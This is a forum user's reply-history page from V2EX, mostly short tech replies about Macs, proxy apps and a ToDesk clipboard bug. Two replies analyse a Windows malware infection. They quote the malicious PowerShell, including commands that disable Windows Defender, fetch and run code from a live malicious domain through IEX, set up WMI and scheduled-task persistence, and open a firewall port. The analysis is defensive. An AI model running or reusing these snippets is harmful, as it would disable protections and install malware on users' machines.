V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  LaureatePoet  ›  全部回复第 1 页 / 共 8 页
回复总数  154
1  2  3  4  5  6  7  8  
83 天前
回复了 TakaObsid 创建的主题 Apple 请教下坛友们二手 macbook 的行情
京东,8 折家电补贴 Macbook Air M3 13inch, 16+256, 可以 7200 拿下。
@chqome #36 我觉得图中的意思也没说港版阉割了 facetime 语音和无线吧。

你可以把图片拿给其他人( or ChatGPT )看,看看大家理解的跟你理解的是否一样?
113 天前
回复了 mingtdlb 创建的主题 信息安全 windows 中毒了
[VirusTotal - m.dat 检测结果]( https://www.virustotal.com/gui/file/c7eaff9d735d8eef42c73be4c093f7b31cf7d0df18c98d135eb915c13409d077/detection)

以下是对这三个 PowerShell 脚本的分别总结:

### 1. **主要脚本 (`power.txt` 脚本)**
- **目的**: 该脚本的目的是通过禁用系统防护和终止某些进程来破坏系统安全,同时下载和执行远程恶意代码。
- **主要操作**:
- **生成随机字符串**: 创建一个随机字符串并将其赋值给变量 `$sys`。
- **禁用 Windows Defender**: 通过多种方法禁用 Windows Defender 和其他安全特性。
- **终止并删除非标准进程**: 检查并终止多个系统关键进程,如 `svchost.exe`、`conhost.exe`,并删除它们的可执行文件。
- **检查恶意进程和服务**: 检查 `winlogon.exe` 是否存在于指定路径,并检测名为 "Windows Updata" 的服务是否正在运行。如果存在,执行从远程服务器下载的恶意代码,否则清除 WMI 持久化机制并重新配置恶意计划任务和 WMI 事件。
- **配置计划任务和防火墙**: 添加防火墙规则和计划任务以维持系统的长期感染状态。

### 2. **`config.txt` 脚本**
- **目的**: 检查配置文件是否已被篡改,如果未被篡改则下载新的配置文件并重新配置系统的持久化机制。
- **主要操作**:
- **检查配置文件**: 读取 `C:\Windows\debug\m\config.json` 内容,查看其中是否包含指定的恶意域名。如果不包含,则下载更新后的配置文件并替换现有文件。
- **更新 WMI 事件和计划任务**: 删除现有的 WMI 事件和计划任务,然后重新创建它们以确保执行恶意代码。
- **创建计划任务**: 通过 `schtasks` 命令创建一个定时任务,该任务定期从远程服务器下载并执行恶意代码。

### 3. **`download.txt` 脚本**
- **目的**: 下载、执行恶意文件,并通过设置权限和计划任务确保其持久性,同时防止系统修复。
- **主要操作**:
- **下载恶意文件**: 从远程服务器下载一个名为 `m.dat` 的文件并将其保存为 `m.exe`。
- **修改文件权限**: 使用 `icacls` 修改 `C:\Windows\debug\m` 目录及其内容的权限,确保恶意文件能够在多种用户环境下执行。
- **执行恶意文件**: 使用 `cmd.exe` 和 `Start-Process` 多次尝试执行下载的恶意文件和相关的脚本/批处理文件。
- **创建计划任务和防火墙规则**: 创建定时任务以确保恶意代码定期执行,同时开放特定端口以便远程管理或数据泄露。
- **清理痕迹**: 删除下载的恶意文件,并终止 `powershell.exe` 进程以减少被检测的风险。

### 总体总结
这些脚本展示了一个精心设计的多层次攻击策略,通过禁用系统防护、修改系统设置、执行恶意代码并创建持久化机制,攻击者可以保持对系统的长期控制并尽量减少被发现的可能性。
113 天前
回复了 mingtdlb 创建的主题 信息安全 windows 中毒了
http://k2ygoods[.]top/power.txt





这个 PowerShell 脚本有很强的恶意行为,涉及禁用 Windows 安全特性、删除系统进程、并尝试从远程服务器下载和执行恶意代码。下面是对脚本的详细分析:

### 1. 生成随机字符串
```powershell
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
```
- 该行代码生成一个长度在 6 到 12 之间的随机字符串,由小写字母和数字组成。

### 2. 定义目标路径
```powershell
$dst="C:\Windows\debug\m\winlogon.exe"
```
- 该变量定义了一个路径,指向`winlogon.exe`的假定位置。

### 3. 禁用防火墙
```powershell
#netsh advfirewall set allprofiles state off
```
- 注释掉的行试图关闭所有 Windows 防火墙。虽然被注释掉,但这显示了脚本的潜在意图。

### 4. 禁用 Windows Defender
```powershell
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
```
- 这些命令禁用了 Windows Defender 的实时监控和反间谍软件功能,使得系统更加容易受到恶意软件的攻击。

### 5. 终止和删除某些进程
```powershell
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'" | %{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
```
- 使用`Get-WmiObject` (gwmi) 获取正在运行的进程,并筛选出特定名称的进程(如`svchost.exe`)。如果这些进程不在预期的系统路径中(如`system32`或`syswow64`),则终止并强制删除其可执行文件。
- 这一段代码显然在试图清除潜在的恶意进程,但也可能用于杀死合法进程,从而破坏系统的正常功能。

### 6. 检查特定进程和服务是否存在
```powershell
$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"
```
- 这两行代码检查`winlogon`进程是否在指定的路径上运行,以及名为`Windows Updata`的服务是否正在运行。

### 7. 从远程服务器下载并执行代码
```powershell
if ($pExsit -and $sExsit) {
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
} else {
...
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}
```
- 如果检查通过,脚本将从`http://k2ygoods.top/config.txt`下载并执行内容;否则,它会清理某些 WMI 事件和消费者,然后从`http://k2ygoods.top/download.txt`下载并执行代码。

### 8. 清除和创建 WMI 事件过滤器与消费者
```powershell
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
...
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" ...
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" ...
```
- 这一部分脚本清除了某些 WMI 事件过滤器和消费者,然后创建了新的过滤器和消费者。新的 WMI 事件设置会在特定条件下(如性能计数器事件)触发执行远程下载的恶意代码。

### 9. 停止和删除服务
```powershell
sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"
```
- 这些命令试图停止并删除名为`Windows Updata`和`Windows Management`的服务。此类操作可能会影响系统的管理功能。

### 10. 开启防火墙规则
```powershell
netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp
```
- 脚本通过添加防火墙规则,允许 TCP 59857 端口的远程访问,这可能会为攻击者提供一个后门。

### 总结
这个脚本是一个恶意脚本,意图禁用系统的安全功能,清理并终止一些系统进程,设置持久化机制,并从远程服务器下载和执行恶意代码。它对系统的安全性构成了严重威胁,运行该脚本可能导致系统被完全控制或被用于进一步的恶意活动。
已解决:远程软件 Todesk 的原因,使用 ToDesk 远程对方设备时,对方设备打开 word ,复制粘贴会乱码。本人使用 RDP 进行远程则不会出现这样的问题。个人猜测是 ToDesk 剪切板的处理问题。(但是还有令人疑惑的一点:受控端打开 word ,鼠标选中文字-右键复制-右键粘贴,仍然会出现问题。我推测在受控阶段,Todesk 接管了设备的剪切板,所以即使受控方自己复制粘贴,依然会通过 ToDesk 的剪切板进行编码,所以造成乱码问题。)




好样的 ToDesk ,今天让我浪费了 5h 去发现问题。
产品有误不是`OfficePlus 2019`,是`Office 2019 Pro`
267 天前
回复了 weishao666 创建的主题 问与答 有没有大模型综述类的介绍
283 天前
回复了 Culacco 创建的主题 macOS Macos 现在的代理软件 sing-box 还是 quanx
Surge
285 天前
回复了 hellolinuxer 创建的主题 Apple 请教:寻找 MacbookPro 靠谱维修店
合肥怡飞维修
注意后续可能会有钓鱼邮件发给你,让你登陆钓鱼的 iCloud 网站
可以试试软件:AlDente Pro

个人觉得还是有效的
318 天前
回复了 roogle 创建的主题 macOS 求一款 macos 上支持 sftp 的 ssh 客户端
RoyalTSX
1  2  3  4  5  6  7  8  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2811 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 33ms · UTC 13:56 · PVG 21:56 · LAX 05:56 · JFK 08:56
Developed with CodeLauncher
♥ Do have faith in what you're doing.